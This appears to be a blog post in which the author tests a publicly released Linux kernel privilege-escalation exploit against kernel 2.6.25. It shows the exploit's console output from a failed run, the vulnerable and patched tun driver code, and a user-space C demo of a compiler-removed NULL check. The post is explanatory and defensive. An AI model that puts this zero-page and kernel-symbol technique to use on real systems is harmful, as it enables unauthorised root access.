Testing for The Recently Released Kernel Attack Code

Brad Spengler of grsecurity has released exploit code for a Linux kernel vulnerability.

The exploit is confirmed against the latest Linux kernel releases (2.6.30 and 2.6.30.1). It was reported to work when SELinux is enabled, and also when PulseAudio is installed: it relies on a suid-root PulseAudio binary, as the run below shows.

This exploit has attracted a lot of attention lately, as can be seen from the news coverage, such as the articles by The Register and the SANS ISC Diary.

I wanted to know whether this exploit works on kernels older than 2.6.30, so I set up a test environment with kernel 2.6.25 and PulseAudio installed.

And here is the result:

./cheddar_bay.sh
pulseaudio: no process killed
[+] Personality set to: PER_SVR4
Pulseaudio is not suid root!

So I made PulseAudio suid root, changed the exploit code a little bit, and tried the exploit again:

./cheddar_bay.sh
pulseaudio: no process killed
[+] Personality set to: PER_SVR4
ALSA lib control.c:909:(snd_ctl_open_noupdate) Invalid CTL front:0
ALSA lib control.c:909:(snd_ctl_open_noupdate) Invalid CTL front:0
[+] MAPPED ZERO PAGE!
[+] Resolved tun_fops to 0xe1345e90
...
[+] Resolved nf_unregister_hooks to 0xc0296265
[+] Resolved security_ops to 0xc05313b0
[+] Resolved audit_enabled to 0xc05228e8
[+] *0xe1345ebc |= 1
[+] b00m!
[+] Disabled security of : nothing, what an insecure machine!
[+] Failed to get root :( Something's wrong.  Maybe the kernel isn't vulnerable?

Oops, something is not working. :(

According to SANS, the vulnerable code looks like this:

struct sock *sk = tun->sk;  /* dereferences tun before it has been checked */

if (!tun)
    return POLLERR;  /* too late: after the dereference above the compiler may drop this check as dead code */

And the fixed code looks like this:

struct sock *sk;
unsigned int mask = 0;

if (!tun)
    return POLLERR;

sk = tun->sk;

What a tricky vulnerability! The fix only moves the assignment below the check, so nothing is dereferenced until tun is known to be non-NULL. In the original ordering the compiler is allowed to assume that tun is valid once it has been dereferenced, so the NULL check is optimised away and a NULL tun reaches the code that follows; with the zero page mapped from user space, the kernel then reads attacker-controlled data. The tun driver only gained its per-device socket (tun->sk) in 2.6.30, so kernels before that never had the offending line, which is consistent with the failed run above.
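To make the ordering problem concrete, here is an added user-space example that is not code from this page, from SANS or from the kernel. It models the two versions of the poll handler with stand-in structures (the struct names, the writeable and has_data fields, and the function names are assumptions made for this illustration): vulnerable_poll keeps the original ordering, fixed_poll the patched one, and signal_from_null_poll runs a handler with a NULL tun in a forked child and reports the signal that killed it, so the difference can be checked without crashing the calling process.

```c
#include <poll.h>
#include <stddef.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Stand-ins for the kernel structures; these are illustration only,
 * not the real struct tun_struct / struct sock. */
struct sock {
    int writeable;          /* stands in for sock_writeable(sk) */
};

struct tun_struct {
    struct sock *sk;
    int has_data;           /* stands in for a non-empty receive queue */
};

/* Same ordering as the code SANS quoted: tun is dereferenced to fetch
 * tun->sk BEFORE the NULL check. The compiler may assume tun is non-NULL
 * after that load and delete the check, so a NULL tun reaches the later
 * accesses. noinline stops the compiler from folding a constant NULL
 * argument at the call site, which would hide the behaviour. */
__attribute__((noinline))
unsigned int vulnerable_poll(struct tun_struct *tun)
{
    struct sock *sk = tun->sk;
    unsigned int mask = 0;

    if (!tun)
        return POLLERR;

    if (tun->has_data)
        mask |= POLLIN;
    if (sk->writeable)
        mask |= POLLOUT;
    return mask;
}

/* The fixed ordering: nothing is dereferenced until tun is known good. */
__attribute__((noinline))
unsigned int fixed_poll(struct tun_struct *tun)
{
    struct sock *sk;
    unsigned int mask = 0;

    if (!tun)
        return POLLERR;

    sk = tun->sk;
    if (tun->has_data)
        mask |= POLLIN;
    if (sk->writeable)
        mask |= POLLOUT;
    return mask;
}

/* Run a handler on a constructed, valid tun (data queued, socket writeable). */
unsigned int poll_valid(unsigned int (*handler)(struct tun_struct *))
{
    struct sock sk = { .writeable = 1 };
    struct tun_struct tun = { .sk = &sk, .has_data = 1 };
    return handler(&tun);
}

/* Run a handler with a NULL tun in a forked child and return the signal
 * that killed it, 0 if it returned normally, -1 on fork/wait failure.
 * In user space the NULL load faults; in the kernel, with page zero
 * mapped by the exploit, the same load reads attacker-controlled data. */
int signal_from_null_poll(unsigned int (*handler)(struct tun_struct *))
{
    /* volatile so the compiler cannot see that the argument is NULL */
    struct tun_struct *volatile null_tun = NULL;
    pid_t pid = fork();
    int status;

    if (pid < 0)
        return -1;
    if (pid == 0) {
        handler(null_tun);
        _exit(0);
    }
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFSIGNALED(status) ? WTERMSIG(status) : 0;
}

int main(void)
{
    printf("valid tun: vulnerable=0x%x fixed=0x%x\n",
           poll_valid(vulnerable_poll), poll_valid(fixed_poll));
    printf("NULL tun : vulnerable killed by signal %d, fixed returns 0x%x\n",
           signal_from_null_poll(vulnerable_poll), fixed_poll(NULL));
    return 0;
}
```

Both handlers agree on a valid tun; only the NULL case separates them. Compiling the vulnerable version with -O2 and inspecting the assembly shows the test on tun gone, which is the same thing the kernel build did to tun_chr_poll.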
